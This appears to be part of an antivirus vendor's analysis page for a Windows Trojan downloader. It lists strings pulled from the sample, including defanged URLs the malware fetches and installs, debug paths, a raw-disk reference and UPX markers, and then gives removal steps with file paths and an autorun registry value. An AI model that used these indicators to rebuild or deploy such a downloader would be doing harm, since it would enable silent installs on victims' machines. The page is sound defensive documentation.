liner:\tempview\misc\setup3\backupdownloader\installobject\InstallObject.hGetExitCodeProcess exit code : %uCInstallObjectAgent::CloseProcessHandleID=%dr:\tempview\misc\setup3\backupdownloader\installobject\InstallObjectDefault.h%d.%d.%d.%dR:\TempView\Misc\Setup3\BackupDownloader\InstallObject\InstallObjectDefault.cpp%s\drivers\usbvideo.sysusbvideo.sys file version: %s5.1.2600.2729usbvideo.sys file version is big than 5.1.2600.2729, no need install KB899271SOFTWARE\Microsoft\Updates\Windows XP\SP3\KB899271has register key:SOFTWARE\Microsoft\Updates\Windows XP\SP3\KB899271 , no need install KB899271hXXp://download.microsoft.com/download/4/6/0/460ca2ec-55b8-46d6-afb6-b644a7e03d71/WindowsXP-KB899271-v4-x86-CHS.exehXXp://dldir1.qq.com/music/clntupate/QzoneMusicInstall.exehXXp://dldir1.qq.com/music/clntupate/QQPhotoDrawExSetupForQQ.exehXXp://dldir1.qq.com/P2PUpdate/P2PSetup.exehXXp://dldir1.qq.com/qqfile/qq/videomsg/VideoMsgInstall.exehXXp://dldir1.qq.com/qqfile/qq/plugin/VideoShowPlayerInstall.exehXXp://dldir1.qq.com/qqfile/qq/plugin/VideoBeautyInstall.exehXXp://dldir1.qq.com/invc/cyclone/QQMiniDL_Setup.exehXXp://dlied6.qq.com/invc/xfspeed/kxg/versetup/QQWifiDL.exeCopy File : %s to %s error, errcode:%luhXXp://dldir1.qq.com/qqfile/qq/plugin/QQGameMicro_setup.exe\QQGame.exeQQGame.exehXXp://dldir1.qq.com/qqfile/qq/plugin/HotWordInstall.exehXXp://androidpc.app.qq.com/app1/vertis.do?id=201409090001BrowserInstaller.exe@hXXp://dldl.qq.com/dl/qqie8hXXp://dldl.qq.com/dl/qqhXXp://dldir1.qq.com/music/clntupate/QQMusicDownloader.exehXXp://dldir1.qq.com/qqtv/qqlivesetup.exeQQBrowser_Setup_QQ.exehXXp://dldir3.qq.com/minigamefile/QQGameDownloader.exehXXp://ws.sj.qq.com/webservices/download.do?yw=qqQQPhoneManager_700024.exe\rundll32.exeR:\TempView\Misc\Setup3\BackupDownloader\Util\7zUtil.cppdecoder doesn't support this archiveERROR #%dgfile path : %sR:\TempView\Misc\Setup3\BackupDownloader\Util\DecryptUtil.cppOpen file failed, error code : %uGet file size failed, error code : %uFile size too large, HighPart = %uAR:\TempView\Misc\Setup3\BackupDownloader\DataReport\DataReport.cppDataReport::UploadInstallResultlog.tlg\\.\PhysicalDrive0Siphlpapi.dllACreateDownloader. uiCustomID = %dstrFilePath = %suiCustomID = %dCDownload::IsWorking(). m_bInited = %dstrUrl = %sstrFileName = %sCDownload::DeleteTask(). uiTaskID = %dCDownload::HandleDeleteTask(). uiTaskID = %dCDownload::DeleteTask(). strUrl = %sCDownload::HandleDeleteTask(). strUrl = %sCDownload::SetDownloadSpeed(). uiSpeed = %dCDownload::SetP2PUploadSpeed(). uiSpeed = %dCDownload::HandleSetP2PUploadSpeed(). uiSpeed = %dCDownload::SetSafeMode(). bSafeMode = %dCDownload::HandleSetSafeMode(). bSafeMode = %dstProxyInfo.eProxyType = %dstProxyInfo.strProxyIP = %sstProxyInfo.usProxyPort = %dCDownload::OnNotify()->OnDownloadComplete. uiTaskID = %d, uiResult = %d, uiErrorCode = %d, uiDetailErrorCode = %dAdlcore.dllQQPCDetector.dllR:\TempView\Misc\Setup3\BackupDownloader\Network\BizInstallerMgr.cpptask:%lu, download error code:%dtask:%lu, filename:%s%d not need to download%d need to downloadname = %surl = %sargs = %sfilename = %sdlcore dll not exist, file:%siter->bFinished:%dStart ObjectId:%um_oDownloadMgr.StartTask returns:%ddefault file %s download ok, local file : %soptional file %s download ok, local file : %s%s...ObjId: %uName: %sUrl: %sArgs: %sFilename: %sinstall a file:%srun install failed, error code : %uGetDectectorResult() successed, wording: %sRunDetector successed, dwOperator == %dRunDetector failed, dwOperator == %ddwOperator Invaild, dwOperator == %dGetInstallObjsReportStringCBizInstallerMgr::GetInstallObjsReportStringR:\TempView\Misc\Setup3\BackupDownloader\Network\BizInstallerWindow.cppWM_TASKTRAY_MSGdwCookie:%dR:\TempView\Misc\Setup3\BackupDownloader\Network\DownloadMgr.cppCreateDownloadTask,Url:%s, localPath:%sCDownloadMgr::CreateHttpDownloadTaskm_oDownloader.StartTask, dwCookie:%d, return %dCDownloadMgr::DeleteTask, dwCookie:%dm_mapCookieToTask.erase, dwCookie:%dszFileName = %s7.1.14522.01, 0, 6, 6- Skin.dll(*.*)%original file name%.exe_584_rwx_10000000_0003E000:
`.rsrcL$(h%fSSh0jmsctls_hotkey32TVCLHotKeyTHotKey\skinh.she}uo,x6l5k%x-l h9p%s m)t4`#be"m?c&y1`Ð<SetViewportOrgExSetViewportExtExSetWindowsHookExAUnhookWindowsHookExEnumThreadWindowsEnumChildWindows`c%US.4/!#$<#$#=.text`.rdata@.data.rsrc@.UPX0`.UPX1`.relochJK.ZHO.qt0KERNEL32.DLLCOMCTL32.dllGDI32.dllMSIMG32.dllMSVCRT.dllMSVFW32.dllUSER32.dllSkinH_EL.dll1, 0, 6, 6- Skin.dll
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
¾Ã°®¸¨Öú.exe:944
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHYZ412V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\K5MFCXY3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\9ifz\¾Ã°®¸¨Öú.exe (1632 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\N4QZRPF3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\9ifz\dlcore.dll (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\I41HJ4J3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (809 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (44 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (815 bytes)- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"½ûÖ¹ºó¿ÉÄÜ»áÑÃÂÖØÓ°ÃÂìõóµÄÎȶ¨ÃÂÃâ€Ã‚£Â¬Â½Â¨Ã’é²»Òª½ûÖ¹£¡" = "%Documents and Settings%\%current user%\Application Data\9ifz\¾Ã°®¸¨Öú.exe"- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.